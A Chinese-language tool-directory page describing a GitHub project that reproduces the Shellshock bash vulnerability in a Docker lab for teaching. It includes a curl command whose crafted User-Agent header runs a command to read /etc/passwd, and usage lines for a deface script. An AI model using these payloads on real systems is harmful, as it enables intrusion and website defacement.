Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2014-6271 — 一个关于CVE(ShellShock)的介绍项目,包含PDF、技术演示和可复现性。 | Kitploit
工具/GitHubGitHub/radyio/cve-2014-6271
容器安全漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubradyio/cve-2014-6271

CVE-2014-6271

一个关于CVE(ShellShock)的介绍项目,包含PDF、技术演示和可复现性。

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

CVE-2014-6271

描述

本项目旨在重现漏洞 CVE-2014-6271,也称为 Shellshock。Shellshock 是 Bash 中的一个安全漏洞,允许通过环境变量执行恶意代码。

本项目的目的是演示此漏洞对 Docker 环境的影响。

前提条件

开始之前,请确保您的计算机上已安装 Docker。您可以在 此处 下载 Docker。

安装与启动

1. 构建 Docker 镜像

在项目目录中,执行以下命令构建 Docker 镜像:

root@kitploit:~
docker build -t ['image name'] .

将 ['image name'] 替换为您想要给 Docker 镜像的名称。

2. 启动 Docker 容器

构建镜像后,使用以下命令从该镜像启动容器:

root@kitploit:~
docker run -it --rm -p 8080:80 ['image name']

这将在本地机器的 8080 端口上暴露服务。

3. 访问应用程序

打开浏览器并访问 http://localhost:8080。您将能够观察应用程序的行为并测试漏洞。

4-1. 利用漏洞

在另一个终端中,执行以下命令以利用漏洞并读取 /etc/passwd 文件的内容:

root@kitploit:~
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable

此命令发送一个专门设计用于利用 Shellshock 的 user-agent 头部。如果漏洞被正确重现,终端输出将显示 /etc/passwd 的内容。

4-2. 利用漏洞(脚本 exp_deface.sh)

该脚本用于利用漏洞篡改目标网页。该漏洞源于 CGI 脚本的错误配置,允许在服务器上执行任意命令。

前提条件:

  • 确保目标对 ShellShock 漏洞易受攻击。
  • 确保您拥有在此目标上测试 exploit 的必要权限。
root@kitploit:~
./exp_deface.sh <ip> <port>

./exp_deface.sh localhost 8080

安全性

重要提示: 此漏洞仅应用于受控环境中的测试和演示目的。请勿在生产环境中使用本项目。

下载工具